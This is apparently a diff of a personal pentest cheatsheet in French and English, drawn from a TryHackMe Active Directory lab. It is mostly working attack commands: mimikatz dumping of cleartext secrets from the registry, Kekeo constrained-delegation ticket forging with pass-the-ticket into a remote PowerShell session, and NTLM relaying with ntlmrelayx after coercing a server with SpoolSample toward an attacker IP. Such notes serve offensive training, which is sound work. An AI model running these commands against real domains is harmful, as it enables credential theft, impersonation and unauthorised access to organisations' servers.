vlzd/pencheatsheet/README.md

           This will establish an SSH session from PC-1 to 1.1.1.1 (Attacker PC) using the tunneluser user.
           Puis sur la kali : munra@attacker-pc$ xfreerdp /v:127.0.0.1 /u:MyUser /p:MyPassword

+    MIMIKATZ / KEKEO DELEGATION KERBEROS
+        Ouvrir mimikatz en powershell admin
+        token::elevate (To dump the secrets from the registry hive, we need to impersonate the SYSTEM user) lsadump::secrets (Mimikatz interacts with the registry hive to pull the clear text credentials.)

+        Ouvrir Kekeo en powershell admin
+        tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:redacted
+            user - The user who has the constrained delegation permissions. domain - The domain that we are attacking since Kekeo can be used to forge tickets to abuse cross-forest trust. password - The password associated with the svcIIS account. tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
+            tgt - We provide the TGT that we generated in the previous step. user - The user we want to impersonate.
+Since t2_ accounts have administrative access over workstations, it is a safe assumption that t1_ accounts will have administrative access over servers, so choose a t1_ account that you would like to impersonate. service - The services we want to impersonate using delegation.
+We first generate a TGS for the HTTP service.
+Then we can rerun the same command for the WSMAN service.

+        reouvrir mimikatz:
+        privilege::debug
+        kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi  (import du ticket wsman)
+        kerberos::ptt TGS_t2_melanie.davies@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi (import du ticket http)

+        quitter mimikatz
+        klist pour voir les tickets
+        New-PSSession -ComputerName thmserver1.za.tryhackme.loc pour créer une session powershell

+    Exploiting Automated Relays
+        MACHINE ACCOUNTS DANS BLOODHOUND:
+          MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
+        Print Spooler Service
+          PS C:\> GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc
+        SMB Signing
+          nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc (We can see that SMB signing is enabled but not enforced based on the output.
+This means all our conditions are met, and we can start the attack!).
+        SET UP NTLM RELAY
+          python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"THMSERVER1 IP" -debug
+          SpoolSample.exe THMSERVER2.za.tryhackme.loc "Attacker IP"

 #[BUFFER OVERFLOW]

     https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst